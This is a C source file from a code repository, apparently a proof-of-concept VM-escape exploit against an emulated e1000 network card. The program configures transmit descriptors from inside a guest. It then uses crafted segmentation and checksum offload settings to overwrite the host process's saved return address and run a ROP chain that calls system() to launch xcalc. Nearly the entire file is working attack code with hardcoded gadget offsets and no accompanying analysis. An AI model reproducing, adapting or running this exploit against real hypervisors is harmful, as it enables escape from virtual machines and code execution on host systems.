-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.c
333 lines (268 loc) · 8.23 KB
/
exploit.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
#include <err.h>
#include <assert.h>
#include <fcntl.h>
#include <inttypes.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/mman.h>
#include <machine/cpufunc.h>
#include <arpa/inet.h>
#include "e1000.h"
#define PAGE_SIZE 0x1000
#define BUFF_SIZE PAGE_SIZE
#define SAVED_RIP_OFF 0x3f68
#define POP_RBP 0x222164
#define POP_RDI 0x21e688
#define LEAVE 0x22dd28
#define SYSTEM 0x21f83c
#define CALC 0x7fffdebf35a8
#define ROPCHAIN 0x7fffdebf3578
#define GET_WORD(val, n) (((val) >> ((n) * 16)) & 0xffff)
#define MAKE_WORD(val, n) htons((htons(GET_WORD(val, n)) - 1))
#define TX_NB 64;
extern uint64_t gva_to_gpa(void *);
void xxd(void *ptr, size_t size)
{
size_t i;
for (i = 0; i < size; i++) {
if (i % 16 == 0) printf("\n0x%"PRIx64": ", (uint64_t)(ptr+i));
printf("%02x", *(uint8_t *)(ptr+i));
if (i % 16 != 0 && i % 2 == 1) printf(" ");
}
printf("\n");
}
/* Legacy transmit descriptor */
struct e1000_tx_desc {
uint64_t buffer_addr; /* Address of the descriptor's data buffer */
union {
uint32_t data;
struct {
uint16_t length; /* Data buffer length */
uint8_t cso; /* Checksum offset */
uint8_t cmd; /* Descriptor control */
} flags;
} lower;
union {
uint32_t data;
struct {
uint8_t status; /* Descriptor status */
uint8_t css; /* Checksum start */
uint16_t special;
} fields;
} upper;
};
/* Context descriptor */
struct e1000_context_desc {
union {
uint32_t ip_config;
struct {
uint8_t ipcss; /* IP checksum start */
uint8_t ipcso; /* IP checksum offset */
uint16_t ipcse; /* IP checksum end */
} ip_fields;
} lower_setup;
union {
uint32_t tcp_config;
struct {
uint8_t tucss; /* TCP checksum start */
uint8_t tucso; /* TCP checksum offset */
uint16_t tucse; /* TCP checksum end */
} tcp_fields;
} upper_setup;
uint32_t cmd_and_length;
union {
uint32_t data;
struct {
uint8_t status; /* Descriptor status */
uint8_t hdr_len; /* Header length */
uint16_t mss; /* Maximum segment size */
} fields;
} tcp_seg_setup;
};
/* Data descriptor */
struct e1000_data_desc {
uint64_t buffer_addr; /* Address of the descriptor's buffer address */
union {
uint32_t data;
struct {
uint16_t length; /* Data buffer length */
uint8_t typ_len_ext;
uint8_t cmd;
} flags;
} lower;
union {
uint32_t data;
struct {
uint8_t status; /* Descriptor status */
uint8_t popts; /* Packet Options */
uint16_t special;
} fields;
} upper;
};
union e1000_tx_udesc {
struct e1000_tx_desc td;
struct e1000_context_desc cd;
struct e1000_data_desc dd;
};
void e1000_write_reg(int reg, uint32_t val)
{
outl(e1000_PORT + CTRL, reg);
outl(e1000_PORT + 4, val);
}
void e1000_tx_enable()
{
e1000_write_reg(TCTL, E1000_TCTL_EN);
}
void e1000_tx_disable()
{
e1000_write_reg(TCTL, 0);
}
void e1000_tx_start(uint8_t tail)
{
e1000_write_reg(TDT, tail);
}
void e1000_tx_transmit(union e1000_tx_udesc *tx_ring, uint8_t *head, struct e1000_context_desc *cd, uint16_t pktlen)
{
// set packet context
memcpy(&tx_ring[*head].cd, cd, sizeof(struct e1000_context_desc));
// set packet data
tx_ring[*head + 1].dd.lower.data = pktlen;
tx_ring[*head + 1].dd.lower.data |= E1000_TXD_CMD_EOP;
tx_ring[*head + 1].dd.lower.data |= E1000_TXD_CMD_TSE;
tx_ring[*head + 1].dd.lower.data |= E1000_TXD_TYP_D;
tx_ring[*head + 1].dd.upper.fields.popts = E1000_TXD_POPTS_TXSM;
*head += 2 % TX_NB;
}
// UDP packet
static char packet[] = {
0x58, 0x9c, 0xfc, 0x0e, 0xb7, 0x3d, 0x58, 0x9c,
0xfc, 0x0f, 0xb4, 0x44, 0x08, 0x00, 0x45, 0x00,
0x00, 0x21, 0x43, 0xad, 0x40, 0x00, 0x40, 0x11,
0xf9, 0x1c, 0x01, 0x02, 0x03, 0x04, 0xc0, 0xa8,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
};
int main()
{
union e1000_tx_udesc *tx_ring;
struct e1000_context_desc tx_cd;
uint8_t tx_nb = TX_NB;
uint16_t tx_size;
char *tx_buffer[tx_nb], *buffer;
uint8_t head = 0;
uint64_t addr;
uint16_t pktlen, hdrlen, paylen, mss, write_off;
uint8_t ipcss, tucss, hdroff;
// get permissions for in/out
open("/dev/io", O_RDONLY, 0);
// configure TX descriptors
warnx("configuring TX descriptors");
tx_size = tx_nb * sizeof(union e1000_tx_udesc);
tx_ring = aligned_alloc(PAGE_SIZE, tx_size);
memset(tx_ring, 0, tx_size);
for(int i = 0; i < tx_nb; i++) {
buffer = aligned_alloc(PAGE_SIZE, BUFF_SIZE);
memcpy(buffer, packet, sizeof(packet));
tx_buffer[i] = buffer;
addr = gva_to_gpa(buffer);
warnx("TX ring buffer at 0x%"PRIx64"\n", addr);
tx_ring[i].dd.buffer_addr = addr;
};
warnx("disable TX");
e1000_tx_disable();
addr = gva_to_gpa(tx_ring);
//warnx("TX ring buffer at 0x%"PRIx64"\n", addr);
warnx("update TX desc table");
e1000_write_reg(TDBAL, (uint32_t)addr);
e1000_write_reg(TDBAH, addr >> 32);
e1000_write_reg(TDLEN, tx_size);
e1000_write_reg(TDH, 0);
warnx("enable TX");
e1000_tx_enable();
/* fill stack with ropchain */
hdrlen = 220;
tx_cd.lower_setup.ip_fields.ipcss = 0;
tx_cd.lower_setup.ip_fields.ipcso = 0;
tx_cd.lower_setup.ip_fields.ipcse = 0;
tx_cd.upper_setup.tcp_fields.tucss = 0;
tx_cd.upper_setup.tcp_fields.tucso = 0;
tx_cd.upper_setup.tcp_fields.tucse = 0;
tx_cd.cmd_and_length = hdrlen;
tx_cd.cmd_and_length |= E1000_TXD_TYP_C;
tx_cd.cmd_and_length |= E1000_TXD_CMD_IP;
tx_cd.tcp_seg_setup.fields.status = 0;
tx_cd.tcp_seg_setup.fields.hdr_len = hdrlen;
tx_cd.tcp_seg_setup.fields.mss = PAGE_SIZE;
memset(tx_buffer[head + 1], 'A', PAGE_SIZE);
uint64_t *ptr = (uint64_t *)tx_buffer[head + 1];
*(ptr + 3) = POP_RDI;
*(ptr + 4) = CALC;
*(ptr + 6) = SYSTEM;
strcpy(tx_buffer[head + 1] + 56, "/usr/local/bin/xcalc");
e1000_tx_transmit(tx_ring, &head, &tx_cd, PAGE_SIZE);
/* corrupting saved rip + 10 */
hdrlen = 32;
hdroff = 0x90;
ipcss = 12;
tucss = 18;
mss = htons(ROPCHAIN & 0xffff) - hdrlen + ipcss;
paylen = 2 * mss;
pktlen = paylen + hdrlen;
tx_cd.lower_setup.ip_fields.ipcss = ipcss;
tx_cd.lower_setup.ip_fields.ipcso = 0;
tx_cd.lower_setup.ip_fields.ipcse = 0;
tx_cd.upper_setup.tcp_fields.tucss = tucss;
tx_cd.upper_setup.tcp_fields.tucso = hdroff;
tx_cd.upper_setup.tcp_fields.tucse = tucss+1;
tx_cd.cmd_and_length = paylen;
tx_cd.cmd_and_length |= E1000_TXD_TYP_C;
tx_cd.cmd_and_length |= E1000_TXD_CMD_IP;
tx_cd.tcp_seg_setup.fields.status = 0;
tx_cd.tcp_seg_setup.fields.hdr_len = hdrlen;
tx_cd.tcp_seg_setup.fields.mss = mss; // WHAT_LOW
write_off = (SAVED_RIP_OFF + 10) - ipcss - 2;
*(uint16_t *)(tx_buffer[head + 1] + tucss) = ~write_off; // WHERE
*(uint16_t *)(tx_buffer[head + 1] + ipcss + 4) = MAKE_WORD(ROPCHAIN, 2);
e1000_tx_transmit(tx_ring, &head, &tx_cd, pktlen);
/* corrupt saved rip + 8 */
write_off = (SAVED_RIP_OFF + 8) - ipcss - 2;
*(uint16_t *)(tx_buffer[head + 1] + tucss) = ~write_off;
*(uint16_t *)(tx_buffer[head + 1] + ipcss + 4) = MAKE_WORD(ROPCHAIN, 1);
e1000_tx_transmit(tx_ring, &head, &tx_cd, pktlen);
/* corrupt saved rip + 16 */
mss = htons(LEAVE & 0xffff) - hdrlen + ipcss;
paylen = 2 * mss;
pktlen = paylen + hdrlen;
tx_cd.cmd_and_length = paylen;
tx_cd.cmd_and_length |= E1000_TXD_TYP_C;
tx_cd.cmd_and_length |= E1000_TXD_CMD_IP;
tx_cd.tcp_seg_setup.fields.status = 0;
tx_cd.tcp_seg_setup.fields.hdr_len = hdrlen;
tx_cd.tcp_seg_setup.fields.mss = mss;
write_off = (SAVED_RIP_OFF + 0x10) - ipcss - 2;
*(uint16_t *)(tx_buffer[head + 1] + tucss) = ~write_off;
*(uint16_t *)(tx_buffer[head + 1] + ipcss + 4) = MAKE_WORD(LEAVE, 1);
e1000_tx_transmit(tx_ring, &head, &tx_cd, pktlen);
/* corrupt saved rip */
tucss = 0;
mss = htons(POP_RBP & 0xffff) - hdrlen + ipcss; // WHAT_LOW
paylen = 2 * mss;
pktlen = paylen + hdrlen;
tx_cd.upper_setup.tcp_fields.tucss = tucss;
tx_cd.upper_setup.tcp_fields.tucse = tucss+1;
tx_cd.cmd_and_length = paylen;
tx_cd.cmd_and_length |= E1000_TXD_TYP_C;
tx_cd.cmd_and_length |= E1000_TXD_CMD_IP;
tx_cd.tcp_seg_setup.fields.status = 0;
tx_cd.tcp_seg_setup.fields.hdr_len = hdrlen;
tx_cd.tcp_seg_setup.fields.mss = mss;
write_off = SAVED_RIP_OFF - ipcss - 2;
*(uint16_t *)(tx_buffer[head + 1] + tucss) = ~write_off; // WHERE
*(uint16_t *)(tx_buffer[head + 1] + ipcss + 4) = MAKE_WORD(POP_RBP, 1); // WHAT_HIGH
e1000_tx_transmit(tx_ring, &head, &tx_cd, pktlen);
e1000_tx_start(head);
//xxd(tx_buffer, sizeof(packet));
return 0;
}